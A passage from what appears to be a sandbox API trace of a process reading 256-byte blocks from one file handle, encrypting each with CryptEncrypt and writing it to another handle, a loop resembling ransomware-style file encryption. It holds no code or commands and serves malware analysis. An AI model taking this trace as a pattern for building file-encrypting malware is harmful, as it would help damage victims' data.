lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.422] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.422] GetLastError () returned 0x0 [0172.422] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.422] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.422] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.422] GetLastError () returned 0x0 [0172.422] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.422] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.422] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.422] GetLastError () returned 0x0 [0172.422] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.422] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.422] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.422] GetLastError () returned 0x0 [0172.422] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.422] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.422] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.422] GetLastError () returned 0x0 [0172.423] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.423] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.423] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.423] GetLastError () returned 0x0 [0172.423] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.423] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.423] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.423] GetLastError () returned 0x0 [0172.423] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.423] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.423] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.423] GetLastError () returned 0x0 [0172.423] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.423] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.423] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.423] GetLastError () returned 0x0 [0172.423] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.423] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.423] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.423] GetLastError () returned 0x0 [0172.423] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.423] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.423] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.423] GetLastError () returned 0x0 [0172.423] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.424] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.424] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.424] GetLastError () returned 0x0 [0172.424] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.424] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.424] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.424] GetLastError () returned 0x0 [0172.424] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.424] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.424] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.424] GetLastError () returned 0x0 [0172.424] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.424] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.424] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.424] GetLastError () returned 0x0 [0172.424] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.424] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.424] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.424] GetLastError () returned 0x0 [0172.424] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.425] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.425] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.425] GetLastError () returned 0x0 [0172.425] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.425] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.425] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.425] GetLastError () returned 0x0 [0172.425] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.425] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.425] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.425] GetLastError () returned 0x0 [0172.425] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.425] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.425] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.425] GetLastError () returned 0x0 [0172.425] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.425] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.425] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.425] GetLastError () returned 0x0 [0172.425] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.425] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.425] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.426] GetLastError () returned 0x0 [0172.426] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.426] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.426] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.426] GetLastError () returned 0x0 [0172.426] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.426] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.427] GetLastError () returned 0x0 [0172.427] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.427] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.427] GetLastError () returned 0x0 [0172.427] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.427] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.427] GetLastError () returned 0x0 [0172.427] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.427] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.427] GetLastError () returned 0x0 [0172.427] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.427] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.427] GetLastError () returned 0x0 [0172.427] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.427] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.427] GetLastError () returned 0x0 [0172.427] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.428] GetLastError () returned 0x0 [0172.428] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.428] GetLastError () returned 0x0 [0172.428] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: 